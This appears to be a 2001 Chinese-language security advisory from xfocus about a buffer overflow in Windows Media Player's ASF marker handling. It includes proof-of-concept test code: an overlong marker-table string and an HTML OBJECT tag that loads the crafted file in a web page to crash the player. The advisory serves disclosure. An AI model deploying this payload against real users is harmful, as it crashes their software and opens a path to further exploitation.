xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

MS Windows Media Player ASF Marker 存在缓冲溢出漏洞


发布时间:2001-08-08
更新时间:2001-08-08
严重程度:
威胁程度:远程拒绝服务
错误类型:输入验证错误
利用方式:客户机模式

受影响系统
MS Windows
详细描述
在.ASF视频文件中嵌入一段很长的marker,当目标用户点marker
查看下面的列表时候WMP会崩溃。

测试代码
使用ASFCHOP.EXE把下面的脚本嵌入到任何ASF文件中:

----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----

点击后WMP会崩溃。

<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
        <PARAM NAME="ShowControls" VALUE="-1">
        <PARAM NAME="ShowGotoBar" VALUE="1">
        <PARAM NAME="ShowStatusBar" VALUE="1">
            <PARAM NAME="ControlType" VALUE="2">
            <PARAM NAME="Filename" VALUE="a.asf">
            <PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>

解决方案
尚无

相关信息
Pauli Ojanpera (pauli_ojanpera@hotmail.com)